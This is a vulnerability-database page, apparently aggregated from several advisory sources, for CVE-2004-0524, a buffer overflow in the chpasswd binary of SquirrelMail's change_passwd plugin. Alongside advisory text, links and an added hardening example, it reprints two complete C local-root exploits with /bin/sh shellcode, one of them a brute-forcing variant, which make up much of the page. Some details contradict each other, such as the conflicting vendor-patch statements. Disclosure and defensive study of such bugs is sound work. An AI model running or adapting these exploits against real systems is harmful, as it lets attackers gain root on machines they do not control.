CVE-2004-0524
CVSS 10.0
Published: 2004-08-06 00:00:00
Revised: 2016-10-17 22:45:55

[Original] Buffer overflow in the chpasswd command in the Change_passwd plugin before 4.0, as used in SquirrelMail, allows local users to gain root privileges via a long user name.


[CNNVD] SquirrelMail Change_Passwd Plugin Remote Buffer Overflow Vulnerability (CNNVD-200408-038)

The SquirrelMail change_passwd plug-in is a web-based password-change plugin for SquirrelMail.
The SquirrelMail change_passwd plugin contains a stack-based buffer overflow; a local or remote attacker can exploit it to escalate privileges or gain unauthorized access.
The chpasswd binary shipped with the Change_passwd plugin does not adequately check the parameters passed to it, so an overly long parameter triggers the buffer overflow. To reach the binary the attacker must be a member of the Webmaster group, the www group, or another group defined by the related software.
The vulnerability can also be exploited through the CGI interface.

- CVSS (Base Score)

CVSS score: 10 [Severe (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (Affected Platforms and Products)

Product and version information (CPE) not yet available

- OVAL (Technical Details for Detection)

No related OVAL definitions found

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0524
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0524
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200408-038
(Official data source) CNNVD

- Other Links and Resources

http://marc.info/?l=bugtraq&m=108222863917958&w=2
(UNKNOWN)  BUGTRAQ  20040417 Squirrelmail Chpasswod bof
http://marc.info/?l=bugtraq&m=108311782032370&w=2
(UNKNOWN)  BUGTRAQ  20040427 Re: Squirrelmail Chpasswod bof
http://www.securityfocus.com/bid/10166
(VENDOR_ADVISORY)  BID  10166
http://www.squirrelmail.org/plugin_view.php?id=117
(UNKNOWN)  CONFIRM  http://www.squirrelmail.org/plugin_view.php?id=117
http://xforce.iss.net/xforce/xfdb/15889
(VENDOR_ADVISORY)  XF  squirrelmail-chpasswd-binary-bo(15889)

- Vulnerability Information

SquirrelMail Change_Passwd Plugin Remote Buffer Overflow Vulnerability
Critical  Boundary Condition Error
2004-08-06 00:00:00 2006-08-28 00:00:00
Remote / Local

- Advisories and Patches

Temporary workaround:
If you cannot install a patch or upgrade immediately, CNNVD recommends the following measures to reduce the threat:
* The following third-party patch may be applied:

http://www.securityfocus.com/data/vulnerabilities/patches/chpasswd-fix.c

Vendor patch:
SquirrelMail
------------
The vendor has not yet released a patch or upgrade. Users of this software are advised to watch the vendor's home page for the latest version:

http://www.squirrelmail.org

- Vulnerability Information (273)

SquirrelMail chpasswd buffer overflow (EDBID:273)
linux local
2004-04-20 Verified
0 x314
/*
 * 0x3142-sq-chpasswd.c
 * Squirremail chpasswd buffer overflow.
 *
 * Tested on SuSE 9.
 * The bug was found by Matias Neiff <matias neiff com ar>
 * Coded by x314 <0x3142 hushmail.com>
 * (c) 2004 Copyright by x314.
 * All Rights Reserved.
 *
 * Greets: m0s krewz.
 *
 */

#include <stdio.h>      /* printf */
#include <stdlib.h>     /* malloc, free, exit */
#include <string.h>     /* strlen */
#include <unistd.h>     /* execle */

/* payload, handed to the target through its environment */
char shellcode[] =
    "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0"
    "\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
    "\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
    "\x68";

int main(int argc, char *argv[])
{
    char *env[2] = {shellcode, NULL};
    int i;
    long ret, *addr_ptr;
    char *buffer, *ptr;

    buffer = malloc(200);

    printf("\n*** Squirremail chpasswd local root exploit by 0x3142@hushmail.com ***\n\n");

    if (argc != 2) {
        printf("Usage: %s <path-to-chpasswd>\n\n", argv[0]);
        exit(0);
    }

    /* estimated location of the environment string on the child's stack */
    ret = 0xbffffffa - strlen(shellcode) - strlen(argv[1]);

    // printf("Using ret = 0x%x\n\n", ret);

    /* fill the 200-byte user-name argument with copies of ret */
    ptr = buffer;
    addr_ptr = (long *) ptr;
    for (i = 0; i < 200; i += 4) {
        *(addr_ptr++) = ret;
    }

    buffer[200-1] = 0;

    /* the argument list must end with a NULL pointer, not a plain 0 */
    execle(argv[1], "chpasswd", buffer, "0x314", "m0s", (char *)0, env);

    free(buffer);

    return 0;
}

// milw0rm.com [2004-04-20]

- Vulnerability Information (417)

SquirrelMail (chpasswd) Local Root Bruteforce Exploit (EDBID:417)
linux local
2004-08-25 Verified
0 Bytes
/*
** PST_chpasswd_exp-v_b.c:
**
** Squirrelmail chpasswd local root bruteforce exploit
** Author:
** Bytes<Bytes[at]ph4nt0m.net> || <Bytes[at]ph4nt0m.org>
** www ph4nt0m net
** Notice:
** v_b: Local bruteforce version
** v_R: remote bruteforce version
**
**
** Greatze: #ph4nt0m,#music@0x557
** All PST member,Grip2,Airsupply,Jambalaya,Ann,Paul,Happy...
** Thax: My GF(Luz),Oyxin,Winewind,Envymask,Eong,luoluo,GoGo(f0r ever)...
**
**
** -=-=-=-=-=-=-=-=-=-= !!![+PH4NT0M TEAM PRIVATE EXPLOIT+]!!! =-=-=-=-=-=-=-=-=-=-
**
** Date: 2004-04 # DO NOT DISTRIBUTE #
**
** You Must get account belong to Webmaster ,www or other webserver groups.
**
*/

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>     /* strlen, memset, memcpy */
#include <sys/wait.h>

#define NOP 0x90
#define Fuckpr0 "./chpasswd" /* you need modify it by yourself */
#define LOOP 2000 /* loop of bruteforce */

/* setuid(0) shellcode by Matias Sedalo 3x ^_^ */

char shellcode[] =
    "\x31\xdb\x53\x8d\x43\x17\xcd\x80\x99\x68\x6e\x2f\x73\x68\x68"
    "\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";

/* returns the current stack pointer; the value is left in %eax (x86 only) */
unsigned long get_esp() {
    __asm__ ("movl %esp,%eax");
}

void *M_malloc(size_t size) {
    register void *value;

    value = malloc(size);
    if (value == NULL) {
        printf("ERROR:virtual memory exhausted...\n");
        exit(-1);
    }
    return value;
}

int main(void) {
    unsigned long ret_addr;
    int i, j = 0, offset = 2, status;
    char *buf1, *buf2;
    pid_t pid;

    ret_addr = get_esp() - strlen(Fuckpr0) - strlen(shellcode);

    printf("\t-------------------------------------------------------\n");
    printf("\t Squirrelmail chpasswd local root bruteforce exploit \n");
    printf("\t code By Bytes<Bytes[at]ph4nt0m.org> 2004 \n");
    printf("\t http://www.ph4nt0m.net \n");
    printf("\t#######################################################\n");

    sleep(1);

    printf("[+] Bruteforce......\n\n");

    sleep(2);

    buf1 = (char *)M_malloc(150);
    buf2 = (char *)M_malloc(600);

    while (j <= LOOP) {
        if ((pid = fork()) == 0) {
            /* buf2 is a pointer, so sizeof(buf2) is the pointer size,
             * not the 600 bytes allocated above */
            memset(buf2, 0x90, sizeof(buf2) - strlen(shellcode) - 8);
            memcpy(buf2 + sizeof(buf2) - strlen(shellcode) - 8, shellcode, sizeof(shellcode));

            /* fill the 150-byte first argument with the guessed address */
            for (i = 0; i < 150; i += 4) {
                *((unsigned long *)(buf1 + i)) = ret_addr;
            }

            printf("buf1 = %s\n", buf1);

            execl(Fuckpr0, "chpasswd", buf1, buf2, (char *)0);
        }

        wait(&status);

        printf("[-] Signal: #%i\n", status);

        if (WIFEXITED(status) != 0) {
            printf("[=] Step.%i: 0x%x\n[~] Exiting...\n", (j/2), ret_addr);
            exit(1);
        } else {
            ret_addr += offset;
            j += offset;
            printf("[=] Offset:%d Use ret:0x%x\n", j, ret_addr);
        }
    }

    free(buf1);
    free(buf2);

    return 1;
}

// milw0rm.com [2004-08-25]

- Vulnerability Information

5551
SquirrelMail Change_passwd Plugin Overflow
Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability Description

Unknown or Incomplete

- Timeline

2004-04-17 Unknown
2004-04-19 Unknown

- Solution

Upgrade to version 4.0 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- References

- Vulnerability Author

Unknown or Incomplete

- Vulnerability Information

SquirrelMail Change_Passwd Plug-in Buffer Overrun Vulnerability
Boundary Condition Error 10166
Yes Yes
2004-04-17 12:00:00 2009-07-12 04:06:00
Discovery is credited to Matias Neiff <matias@neiff.com.ar>.

- Affected Software Versions

SquirrelMail change_passwd 3.1 -1.2.8

- Vulnerability Discussion

The SquirrelMail change_passwd plug-in is prone to a stack-based buffer overrun vulnerability. The issue exists in the backend chpasswd binary.

This vulnerability could potentially be exploited by a local user to execute arbitrary code as root.

Note that, depending on how the software is configured, the local user may need additional privileges to exploit this issue, such as membership in a special group on the system (for example webmasters or www) or access to a special user account.

This issue may also be remotely exploitable via the CGI interface of the software.
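To make the bug class concrete from the defender's side, the following is an added example and not the chpasswd source or any code from this advisory: a setuid helper that copies an attacker-controlled argument (here, the user name) into a fixed-size stack buffer, shown as the unbounded pattern beside a hardened version. The buffer size `NAME_MAX_LEN`, the function names and the `handle_request` wrapper are hypothetical; the real chpasswd buffer size is not given on this page. The hardened path checks the length before any copy, bounds the scan so it never reads past the limit, and rejects empty names and characters that have no business in a user name.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Hypothetical fixed buffer size; chosen for the example, not taken from chpasswd. */
#define NAME_MAX_LEN 32

/* Vulnerable pattern: copies the argument into a fixed buffer with no bound.
 * Shown only to make the bug shape visible; nothing here calls it. */
void copy_name_unbounded(char *dst, const char *src)
{
    strcpy(dst, src);   /* overflows dst once strlen(src) >= NAME_MAX_LEN */
}

/* Hardened version: validate the length first, then copy with an explicit bound.
 * Returns 0 on success, -1 if the input is empty, too long, or contains
 * characters that are not reasonable in a user name. */
int copy_name_checked(char dst[NAME_MAX_LEN], const char *src)
{
    /* memchr stops at the first NUL, so it never scans past NAME_MAX_LEN bytes */
    const char *nul = memchr(src, '\0', NAME_MAX_LEN);
    if (nul == NULL)
        return -1;                          /* no terminator within the limit */
    size_t len = (size_t)(nul - src);
    if (len == 0)
        return -1;                          /* empty name */
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)src[i];
        if (!(isalnum(c) || c == '_' || c == '-' || c == '.'))
            return -1;
    }
    memcpy(dst, src, len);
    dst[len] = '\0';
    return 0;
}

/* Stand-in for a setuid helper's argument handling (hypothetical).
 * Returns 0 if the name was accepted, -1 if it was rejected. */
int handle_request(const char *user_arg)
{
    char name[NAME_MAX_LEN];
    if (copy_name_checked(name, user_arg) != 0) {
        fprintf(stderr, "rejected user name (empty, too long, or bad characters)\n");
        return -1;
    }
    /* the privileged password update would follow here */
    return 0;
}

int main(void)
{
    /* Constructed inputs: an ordinary name and a 200-byte one, the same
     * length the published exploits hand to chpasswd. */
    char longname[201];
    memset(longname, 'A', 200);
    longname[200] = '\0';

    printf("alice      -> %d\n", handle_request("alice"));
    printf("200 x 'A'  -> %d\n", handle_request(longname));
    printf("'bad name' -> %d\n", handle_request("bad name"));
    return 0;
}
```

The point of `memchr` with a bounded length (rather than `strlen`) is that even the validation step must not trust the input to be terminated; a helper that calls `strlen` on a 200-byte argument has already walked the attacker's data before deciding whether to reject it.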

- Exploit

The following exploits have been released: an exploit consisting of two source files, SPK-chpasswd.c and setegg.c, supplied by SpikE VrM, and a Perl-based exploit, moron.pl, supplied by rip@overflow.no.

- Solution

The vendor has released an upgrade to address this issue:


SquirrelMail change_passwd 3.1 -1.2.8

- References